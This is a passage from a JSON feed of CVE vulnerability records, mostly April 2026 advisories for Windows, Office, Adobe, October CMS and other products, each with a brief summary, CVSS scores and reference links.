locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26181"],"published_time":"2026-04-14T18:16:54","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26182","summary":"Use after free in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26182"],"published_time":"2026-04-14T18:16:54","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26176","summary":"Heap-based buffer overflow in Windows Client Side Caching driver (csc.sys) allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26176"],"published_time":"2026-04-14T18:16:53","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26177","summary":"Use after free in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26177"],"published_time":"2026-04-14T18:16:53","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26178","summary":"Integer size truncation in Windows Advanced Rasterization Platform (WARP) allows an unauthorized attacker to elevate privileges locally.","cvss":8.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26178"],"published_time":"2026-04-14T18:16:53","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26173","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26173"],"published_time":"2026-04-14T18:16:52","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26174","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Server Update Service allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26174"],"published_time":"2026-04-14T18:16:52","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26175","summary":"Use of uninitialized resource in Windows Boot Manager allows an unauthorized attacker to bypass a security feature with a physical attack.","cvss":4.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.6,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26175"],"published_time":"2026-04-14T18:16:52","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26170","summary":"Improper input validation in Microsoft PowerShell allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26170"],"published_time":"2026-04-14T18:16:51","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26171","summary":"Uncontrolled resource consumption in .NET allows an unauthorized attacker to deny service over a network.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26171"],"published_time":"2026-04-14T18:16:51","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26172","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Push Notifications allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26172"],"published_time":"2026-04-14T18:16:51","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26166","summary":"Double free in Windows Shell allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26166"],"published_time":"2026-04-14T18:16:50","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26167","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Push Notifications allows an authorized attacker to elevate privileges locally.","cvss":8.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26167"],"published_time":"2026-04-14T18:16:50","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26168","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26168"],"published_time":"2026-04-14T18:16:50","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26169","summary":"Buffer over-read in Windows Kernel Memory allows an authorized attacker to disclose information locally.","cvss":6.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26169"],"published_time":"2026-04-14T18:16:50","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26162","summary":"Access of resource using incompatible type ('type confusion') in Windows OLE allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26162"],"published_time":"2026-04-14T18:16:49","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26163","summary":"Double free in Windows Kernel allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26163"],"published_time":"2026-04-14T18:16:49","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26165","summary":"Use after free in Windows Shell allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26165"],"published_time":"2026-04-14T18:16:49","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26159","summary":"Missing authentication for critical function in Windows Remote Desktop Licensing Service allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26159"],"published_time":"2026-04-14T18:16:48","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26160","summary":"Missing authentication for critical function in Windows Remote Desktop Licensing Service allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26160"],"published_time":"2026-04-14T18:16:48","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26161","summary":"Untrusted pointer dereference in Windows Sensor Data Service allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26161"],"published_time":"2026-04-14T18:16:48","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26155","summary":"Microsoft Local Security Authority Subsystem Service Information Disclosure Vulnerability","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26155"],"published_time":"2026-04-14T18:16:47","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26156","summary":"Heap-based buffer overflow in Windows Hyper-V allows an unauthorized attacker to execute code locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26156"],"published_time":"2026-04-14T18:16:47","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26152","summary":"Insecure storage of sensitive information in Windows Cryptographic Services allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26152"],"published_time":"2026-04-14T18:16:46","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26153","summary":"Out-of-bounds read in Windows Encrypting File System (EFS) allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26153"],"published_time":"2026-04-14T18:16:46","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26154","summary":"Improper input validation in Windows Server Update Service allows an unauthorized attacker to perform tampering over a network.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26154"],"published_time":"2026-04-14T18:16:46","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-24906","summary":"October is a Content Management System (CMS) and web platform. Versions prior to 3.7.14 and 4.1.10 contain a Stored Cross-Site Scripting (XSS) vulnerability in the Backend Editor Settings. The Markup Classes fields (used for paragraph styles, inline styles, table styles, etc.) did not sanitize input to valid CSS class name characters. Malicious values were rendered unsanitized in Froala editor dropdown menus, allowing JavaScript execution when any user opened a RichEditor. Exploitation could lead to privilege escalation if a superuser opens any RichEditor during routine content editing (e.g., editing a blog post), and requires authenticated backend access with editor settings permissions. This issue has been fixed in versions 3.7.14 and 4.1.10. To workaround this issue, restrict editor settings permissions to fully trusted administrators only","cvss":5.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.1,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/octobercms/october/security/advisories/GHSA-6qmh-j78v-ffp7"],"published_time":"2026-04-14T18:16:45","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-24907","summary":"October is a Content Management System (CMS) and web platform. Versions prior to 3.7.14 and 4.1.10 contain a stored cross-site scripting (XSS) vulnerability in the Event Log mail preview feature. When viewing logged mail messages, HTML content was rendered in an iframe without proper sandboxing, allowing JavaScript execution in the viewer's browser context. This issue has been fixed in versions 3.7.14 and 4.1.10. If users are unable to update immediately, workarounds include restricting mail template editing permissions to fully trusted administrators only and restricting Event Log viewing permissions to minimize exposure.","cvss":5.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.1,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/octobercms/october/security/advisories/GHSA-j4j5-9x6g-rgxc"],"published_time":"2026-04-14T18:16:45","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-25184","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Applocker Filter Driver (applockerfltr.sys) allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-25184"],"published_time":"2026-04-14T18:16:45","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26143","summary":"Improper input validation in Microsoft PowerShell allows an unauthorized attacker to bypass a security feature locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26143"],"published_time":"2026-04-14T18:16:45","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26149","summary":"Improper neutralization of escape, meta, or control sequences in Microsoft Power Apps allows an authorized attacker to bypass a security feature over a network.","cvss":9.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26149"],"published_time":"2026-04-14T18:16:45","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26151","summary":"Insufficient ui warning of dangerous operations in Windows Remote Desktop allows an unauthorized attacker to perform spoofing over a network.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26151"],"published_time":"2026-04-14T18:16:45","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-23653","summary":"Improper neutralization of special elements used in a command ('command injection') in GitHub Copilot and Visual Studio Code allows an authorized attacker to disclose information over a network.","cvss":5.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23653"],"published_time":"2026-04-14T18:16:44","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-23657","summary":"Use after free in Microsoft Office Word allows an unauthorized attacker to execute code locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23657"],"published_time":"2026-04-14T18:16:44","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-23666","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in .NET Framework allows an unauthorized attacker to deny service over a network.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23666"],"published_time":"2026-04-14T18:16:44","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-23670","summary":"Untrusted pointer dereference in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to bypass a security feature locally.","cvss":5.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23670"],"published_time":"2026-04-14T18:16:44","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-20930","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Management Services allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20930"],"published_time":"2026-04-14T18:16:43","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-20945","summary":"Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.","cvss":4.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.6,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20945"],"published_time":"2026-04-14T18:16:43","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-21331","summary":"Adobe Connect versions 2025.3, 12.10 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. Scope is changed.","cvss":6.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/connect/apsb26-37.html"],"published_time":"2026-04-14T18:16:43","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-0390","summary":"Reliance on untrusted inputs in a security decision in Windows Boot Loader allows an authorized attacker to bypass a security feature locally.","cvss":6.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-0390"],"published_time":"2026-04-14T18:16:42","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-20806","summary":"Access of resource using incompatible type ('type confusion') in Windows COM allows an authorized attacker to disclose information locally.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20806"],"published_time":"2026-04-14T18:16:42","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-20928","summary":"Improper removal of sensitive information before storage or transfer in Windows Recovery Environment Agent allows an unauthorized attacker to bypass a security feature with a physical attack.","cvss":4.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.6,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20928"],"published_time":"2026-04-14T18:16:42","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-70023","summary":"An issue pertaining to CWE-843: Access of Resource Using Incompatible Type was discovered in transloadit uppy v0.25.6.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://gist.github.com/zcxlighthouse/27926a85371ac5d2291f44903254753e","https://github.com/transloadi","https://github.com/transloadit/uppy"],"published_time":"2026-04-14T18:16:41","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-0207","summary":"A vulnerability exists in FlashBlade whereby sensitive information may be logged under specific conditions.","cvss":8.5,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":8.5,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://support.purestorage.com/bundle/m_security_bulletins/page/Pure_Security/topics/concept/c_security_bulletins.html"],"published_time":"2026-04-14T18:16:41","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-0209","summary":"Under certain administrative conditions, FlashArray Purity may apply snapshot retention policies earlier or later than configured.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.9,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://support.purestorage.com/bundle/m_security_bulletins/page/Pure_Security/topics/concept/c_security_bulletins.html"],"published_time":"2026-04-14T18:16:41","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34622","summary":"Acrobat Reader versions 26.001.21411, 24.001.30360, 24.001.30362 and earlier are affected by an Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":8.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.6,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/acrobat/apsb26-44.html"],"published_time":"2026-04-14T17:16:51","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34626","summary":"Acrobat Reader versions 26.001.21411, 24.001.30360, 24.001.30362 and earlier are affected by an Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') vulnerability that could result in arbitrary file system read in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":6.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.3,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/acrobat/apsb26-44.html"],"published_time":"2026-04-14T17:16:51","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27284","summary":"InDesign Desktop versions 20.5.2, 21.2 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/indesign/apsb26-32.html"],"published_time":"2026-04-14T17:16:48","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27285","summary":"InDesign Desktop versions 20.5.2, 21.2 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could lead to application denial-of-service. An attacker could exploit this vulnerability to crash the application or disrupt its functionality. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/indesign/apsb26-32.html"],"published_time":"2026-04-14T17:16:48","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27286","summary":"InDesign Desktop versions 20.5.2, 21.2 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could lead to memory exposure. An attacker could leverage this vulnerability to disclose sensitive information stored in memory. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/indesign/apsb26-32.html"],"published_time":"2026-04-14T17:16:48","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27291","summary":"InDesign Desktop versions 20.5.2, 21.2 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/indesign/apsb26-32.html"],"published_time":"2026-04-14T17:16:48","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27238","summary":"InDesign Desktop versions 20.5.2, 21.2 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/indesign/apsb26-32.html"],"published_time":"2026-04-14T17:16:47","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27283","summary":"InDesign Desktop versions 20.5.2, 21.2 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/indesign/apsb26-32.html"],"published_time":"2026-04-14T17:16:47","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-22692","summary":"October is a Content Management System (CMS) and web platform. Versions prior to 3.7.13 and versions 4.0.0 through 4.1.4 contain a sandbox bypass vulnerability in the optional Twig safe mode feature (CMS_SAFE_MODE). Certain methods on the collect() helper were not properly restricted, allowing authenticated users with template editing permissions to bypass sandbox protections. Exploitation requires authenticated backend access with CMS template editing permissions and only affects installations with CMS_SAFE_MODE enabled (disabled by default). This issue has been fixed in versions 3.7.13 and 4.1.5. To workaround this issue, users can disable CMS_SAFE_MODE if untrusted template editing is not required, and restrict CMS template editing permissions to fully trusted administrators only.","cvss":4.9,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.9,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/octobercms/october/security/advisories/GHSA-m5qg-jc75-4jp6"],"published_time":"2026-04-14T17:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4832","summary":"CWE-798 Use of Hard-coded Credentials vulnerability exists that could cause unauthorized access to sensitive device information when an unauthenticated attacker is able to interrogate the SNMP port.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.9,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-104-03&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2026-104-03.pdf"],"published_time":"2026-04-14T16:16:48","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5713","summary":"The \"profiling.sampling\" module (Python 3.15+) and \"asyncio introspection capabilities\" (3.14+, \"python -m asyncio ps\" and \"python -m asyncio pstree\") features could be used to read and write addresses in a privileged process if that process connected to a malicious or \"infected\" Python process via the remote debugging feature. This vulnerability requires persistently and repeatedly connecting to the process to be exploited, even after the connecting process crashes with high likelihood due to ASLR.","cvss":5.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.3,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/python/cpython/commit/289fd2c97a7e5aecb8b69f94f5e838ccfeee7e67","https://github.com/python/cpython/issues/148178","https://github.com/python/cpython/pull/148187","https://mail.python.org/archives/list/security-announce@python.org/thread/OG4RHARYSNIE22GGOMVMCRH76L5HKPLM/"],"published_time":"2026-04-14T16:16:48","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39815","summary":"A improper neutralization of special elements used in an sql command ('sql injection') vulnerability in Fortinet FortiDDoS-F 7.2.1 through 7.2.2 may allow attacker to execute unauthorized code or commands via sending crafted HTTP requests","cvss":8.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-119"],"published_time":"2026-04-14T16:16:46","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39809","summary":"A improper neutralization of special elements used in 